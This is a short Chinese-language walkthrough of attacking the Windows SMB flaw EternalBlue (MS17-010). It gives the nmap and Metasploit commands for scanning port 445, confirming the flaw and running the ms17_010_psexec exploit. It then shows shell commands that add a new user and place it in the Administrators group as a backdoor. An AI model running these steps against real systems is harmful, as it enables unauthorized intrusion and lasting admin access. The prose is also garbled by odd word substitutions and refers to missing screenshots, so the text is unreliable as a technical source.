Eternal Blue永恒之蓝漏洞利用--洪水猛兽

我有病你有病

Eternal Blue永久之蓝破绽操纵

0x01 破绽引见
甚么是永久之蓝破绽：歹意代码操纵Windows体系的SMB破绽能够获得体系最下权限。徒弟们扫描开放445（文件及挨印机同享）端心的Windows效劳器，对该破绽停止操纵后无需用户任何操纵，只需开机上彀，便可背目的靶机植进长途掌握木马，歹意插件等。哎呀实在便是那个没有要脸的勒索病毒本型。
0x02 端心扫描
利用nmap对靶机停止端心扫描探测445端心能否开启：nmap -sS 靶机IP
0x03 破绽扫描
思绪一：nmap剧本定面扫描：nmap --script=smb-vuln-ms17-010 靶机IP
思绪两：msf剧本定面扫描：1.use auxiliary/scanner/smb/smb_ms17_010；
2.set RHOST 靶机IP；
3. set THREADS 10(整快面）；
4.exploit；
注：闭了您那个防水墙
扫出去有破绽便是如许的：

0x04 破绽进犯
利用msf中现成的exp进犯便可：
1.use exploit/windows/smb/ms17_010_psexec；
2.show options；
3.set RHOSTS 靶机IP;
4.exoloit冲；
注：别记把收集整大白女的
胜利以后是如许的：

0x05 提权
利用正在内乱存中混合的shell ,meterpreter停止新建用户并提权操纵：
1.shell;
2.whoami;
3.net user zmy zmy /add;
4.net localgroup Administrators zmy /add;

胜利脱上小马甲，提权胜利可以使用新建的用户停止后绝操纵了：

后绝？后绝便出了本人渐渐悟吧，拿key闪人：）

免责声明：假如进犯了您的权益，请联络站少，我们会实时删除侵权内乱容，感谢协作！